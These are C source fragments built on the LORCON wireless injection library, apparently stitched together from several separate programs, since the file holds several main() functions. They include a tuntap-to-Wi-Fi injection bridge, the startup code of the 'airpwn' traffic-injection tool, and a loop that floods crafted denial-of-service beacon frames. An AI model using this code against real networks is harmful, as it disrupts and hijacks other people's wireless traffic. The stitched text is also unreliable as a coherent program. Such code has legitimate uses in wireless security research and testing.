static void init_lorcon()
{
/* Parameters for LORCON */
int drivertype = tx80211_resolvecard("iwlwifi");
/* Initialize LORCON tx struct */
if (tx80211_init(&tx, "wlan0", drivertype) < 0) {
fprintf(stderr, "Error initializing LORCON: %s\n",
tx80211_geterrstr(&tx));
exit(1);
}
if (tx80211_open(&tx) < 0 ) {
fprintf(stderr, "Error opening LORCON interface\n");
exit(1);
}
/* Set up rate selection packet */
tx80211_initpacket(&tx_packet);
}
static VALUE lorcon_device_open(int argc, VALUE *argv, VALUE self) {
struct rldev *rld;
int ret = 0;
int drivertype = INJ_NODRIVER;
char *driver, *intf;
VALUE rbdriver, rbintf;
VALUE obj;
rb_scan_args(argc, argv, "2", &rbintf, &rbdriver);
driver = STR2CSTR(rbdriver);
intf = STR2CSTR(rbintf);
obj = Data_Make_Struct(cDevice, struct rldev, 0, lorcon_device_free, rld);
drivertype = tx80211_resolvecard(driver);
if (drivertype == INJ_NODRIVER) {
rb_raise(rb_eArgError, "Lorcon did not recognize the specified driver");
return(Qnil);
}
if (tx80211_init(&rld->in_tx, intf, drivertype) < 0) {
rb_raise(rb_eRuntimeError, "Lorcon could not initialize the interface: %s", tx80211_geterrstr(&rld->in_tx));
return(Qnil);
}
/* Open the interface to get a socket */
ret = tx80211_open(&rld->in_tx);
if (ret < 0) {
rb_raise(rb_eRuntimeError, "Lorcon could not open the interface: %s", tx80211_geterrstr(&rld->in_tx));
return(Qnil);
}
rb_obj_call_init(obj, 0, 0);
return(obj);
}
int main(int argc, char *argv[])
{
struct tx80211 in_tx;
struct tx80211_packet in_packet;
struct ifreq ifr;
int ret = 0, channel = 0, c = 0, ttfd = -1, intfd = -1, flags = 0;
int drivertype = INJ_NODRIVER;
char iface[16 + 1];
char tface[16 + 1];
char errstr[PCAP_ERRBUF_SIZE + 1];
pcap_t *pd;
const u_char *pcap_pkt;
struct pcap_pkthdr pcap_hdr;
memset(iface, 0, sizeof(iface));
memset(tface, 0, sizeof(tface));
while ((c = getopt(argc, argv, "i:t:d:c:")) != EOF) {
switch (c) {
case 'i':
strncpy(iface, optarg, sizeof(iface) - 1);
break;
case 't':
strncpy(tface, optarg, sizeof(tface) - 1);
break;
case 'd':
drivertype = tx80211_resolvecard(optarg);
break;
case 'c':
if (sscanf(optarg, "%d", &channel) != 1) {
fprintf(stderr,
"%s: Illegal channel on cmd line",
argv[0]);
usage();
return -1;
}
break;
default:
break;
}
}
if (!strlen(iface)) {
fprintf(stderr, "Must specify an interface name.\n");
usage();
return -1;
}
if (!strlen(tface)) {
fprintf(stderr, "Must specify a tuntap interface name.\n");
usage();
return -1;
}
if (drivertype == INJ_NODRIVER) {
fprintf(stderr, "Driver name not recognized.\n");
usage();
return -1;
}
if (tx80211_init(&in_tx, iface, drivertype) < 0) {
perror("tx80211_init");
return -1;
}
/* Create the tuntap device */
if ((ttfd = open("/dev/net/tun", O_RDWR)) < 0) {
perror("Could not open /dev/net/tun control file");
return -1;
}
memset(&ifr, 0, sizeof(ifr));
ifr.ifr_flags = (IFF_TAP | IFF_NO_PI);
strncpy(ifr.ifr_name, tface, sizeof(tface) - 1);
if (ioctl(ttfd, TUNSETIFF, (void *) &ifr) < 0) {
perror("Unable to create tuntap interface");
return -1;
}
/* bring the tuntap up */
if ((intfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
perror("Failed to create AF_INET socket");
return -1;
}
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, tface, IFNAMSIZ);
if (ioctl(intfd, SIOCGIFFLAGS, &ifr) < 0) {
perror("Failed to get interface flags for tuntap");
return -1;
}
flags = ifr.ifr_flags;
flags |= (IFF_UP | IFF_RUNNING | IFF_PROMISC);
ifr.ifr_flags = flags;
if (ioctl(intfd, SIOCSIFFLAGS, &ifr) < 0) {
perror("Failed to set interface flags for tuntap");
return -1;
}
close(intfd);
/* Set monitor mode */
ret = tx80211_setmode(&in_tx, IW_MODE_MONITOR);
if (ret != 0) {
fprintf(stderr, "Error setting mode, returned %d.\n", ret);
return 1;
}
/* Switch to the given channel */
ret = tx80211_setchannel(&in_tx, channel);
if (ret < 0) {
fprintf(stderr, "Error setting channel, returned %d.\n", ret);
return 1;
}
/* Open the interface to get a socket */
ret = tx80211_open(&in_tx);
if (ret < 0) {
fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname);
return 1;
}
/* Open the pcap interface */
pd = pcap_open_live(tface, MAX_PACKET_LEN, 1, 1000, errstr);
if (pd == NULL) {
perror("Failed to open tuntap with pcap");
fprintf(stderr, "%s\n", errstr);
return 1;
}
fprintf(stderr, "Linked %s to %s, waiting for packets...\n", tface, iface);
while (1) {
if ((pcap_pkt = pcap_next(pd, &pcap_hdr)) == NULL) {
pcap_perror(pd, "Failed to get next packet from tuntap");
break;
}
in_packet.packet = (u_char *) pcap_pkt;
in_packet.plen = pcap_hdr.caplen;
ret = tx80211_txpacket(&in_tx, &in_packet);
if (ret < 0) {
fprintf(stderr, "Unable to transmit packet, returned %d.\n", ret);
perror("tx80211_txpacket");
break;
}
}
tx80211_close(&in_tx);
return 0;
}
int main(int argc, char **argv){
char *conf_file = NULL;
char lnet_err[LIBNET_ERRBUF_SIZE];
char *filterstr=NULL;
int drivertype=INJ_NODRIVER; /* for lorcon */
wepkey *tmpkey;
if (argc < 7) { // minimum # of arguments
usage();
exit(1);
}
airpwn_ctx *ctx = calloc(1, sizeof(airpwn_ctx));
if(ctx == NULL){
perror("calloc");
exit(1);
}
// some default ctx values
ctx->iface_mtu = 1460;
ctx->fcs_present = 1;
for(;;){
int c = getopt(argc, argv, "i:o:c:l:f:vhd:C:M:I:k:m:F");
if(c < 0)
break;
switch(c){
case 'h':
usage();
exit(0);
case 'v':
ctx->verbosity++;
break;
case 'i':
ctx->control_if = optarg;
ctx->inject_if = optarg;
ctx->monitor_if = optarg;
break;
case 'c':
conf_file = optarg;
break;
case 'f':
filterstr = optarg;
break;
case 'l':
ctx->logfile = fopen(optarg, "a");
if(ctx ->logfile == NULL){
perror("fopen");
exit(1);
}
break;
case 'd':
drivertype = tx80211_resolvecard(optarg);
break;
case 'M':
ctx->monitor_if = optarg;
break;
case 'C':
ctx->control_if = optarg;
break;
case 'I':
ctx->inject_if = optarg;
break;
case 'k':
tmpkey = parse_wepkey(optarg);
if(tmpkey == NULL){
fprintf(stderr, "Error parsing WEP key: %s\n", optarg);
exit(1);
}
tmpkey->next = ctx->keys;
ctx->keys = tmpkey;
break;
case 'm':
ctx->iface_mtu = (uint16_t)strtol(optarg, NULL, 10);
break;
case 'F':
ctx->fcs_present = 0;
break;
default:
usage();
exit(1);
}
}
if(ctx->control_if == NULL || ctx->monitor_if == NULL ||
ctx->inject_if == NULL || conf_file == NULL){
usage();
exit(1);
}
printlog(ctx, 1, "Parsing configuration file..\n");
ctx->conf_list = parse_config_file(conf_file);
if(ctx->conf_list == NULL){
printf("Error parsing configuration file.\n");
exit(1);
}
/* Initialize lorcon here */
if (drivertype == INJ_NODRIVER) {
fprintf(stderr, "Driver name not recognized.\n");
usage();
return 1;
}
printlog(ctx, 1, "Opening command socket..\n");
/* Initialize lorcon function pointers and other parameters */
if (tx80211_init(&ctx->control_tx, ctx->control_if, drivertype) < 0) {
fprintf(stderr, "Error initializing lorcon.\n");
return 1;
}
printlog(ctx, 1, "Opening monitor socket..\n");
/* Initialize lorcon function pointers and other parameters */
if (tx80211_init(&ctx->monitor_tx, ctx->monitor_if, drivertype) < 0) {
fprintf(stderr, "Error initializing lorcon.\n");
return 1;
}
printlog(ctx, 1, "Opening injection socket..\n");
/* Initialize lorcon function pointers and other parameters */
if (tx80211_init(&ctx->inject_tx, ctx->inject_if, drivertype) < 0) {
fprintf(stderr, "Error initializing lorcon.\n");
return 1;
}
/* Set monitor mode */
if (tx80211_setmode(&ctx->monitor_tx, IW_MODE_MONITOR) != 0) {
fprintf(stderr, "Error setting monitor mode for interface %s.\n",
ctx->monitor_tx.ifname);
//return 1;
}
/* Open the interface to get a socket */
if (tx80211_open(&ctx->inject_tx) < 0) {
fprintf(stderr, "Unable to open interface %s.\n", ctx->inject_tx.ifname);
return 1;
}
/* ctx->lnet = libnet_init(LIBNET_LINK_ADV, ctx->in_if, lnet_err); */
ctx->lnet = libnet_init(LIBNET_LINK_ADV, "lo", lnet_err);
if(ctx->lnet == NULL){
printf("Error in libnet_init: %s\n", lnet_err);
exit(1);
}
printlog(ctx, 0, "Listening for packets...\n");
pthread_t thread;
if(pthread_create(&thread, NULL, channel_thread, ctx)){
perror("pthread_create");
exit(1);
}
pcap_monitor(ctx->monitor_if, ctx, filterstr);
return 0;
}
int
main(int argc, char **argv)
{
struct tx80211 tx;
struct tx80211_packet pkt;
char p1[BEACON_NOSSID_LEN];
char p2[BEACON_SSID_LEN];
int ret, drivertype;
uint8_t randbyte;
if (argc < 3) {
usage(argv);
return 0;
}
printf("[+] Initializing interface %s...\n", argv[1]);
drivertype = tx80211_resolvecard(argv[2]);
if (drivertype == INJ_NODRIVER) {
printf("[-] Driver name not recognized.\n");
exit(1);
}
ret = tx80211_init(&tx, argv[1], drivertype);
if (ret < 0) {
printf("[-] Error initializing %s/%s", argv[1], argv[2]);
exit(1);
}
ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON);
if (ret != 0) {
printf("[-] Error setting monitor mode.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_setchannel(&tx, 11);
if (ret < 0) {
printf("[-] Error setting channel.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_open(&tx);
if (ret < 0) {
printf("[-] Unable to open interface %s\n", tx.ifname);
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
srand(time(NULL));
memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN);
memcpy(p2, BEACON_SSID, BEACON_SSID_LEN);
printf("[+] Injecting crafted DoS beacon frames...\n");
while (1) {
randbyte = rand() & 0xff;
p1[15] = randbyte;
p1[21] = randbyte;
p2[15] = randbyte;
p2[21] = randbyte;
pkt.packet = p1;
pkt.plen = BEACON_NOSSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
pkt.packet = p2;
pkt.plen = BEACON_SSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
}
tx80211_close(&tx);
return 0;
}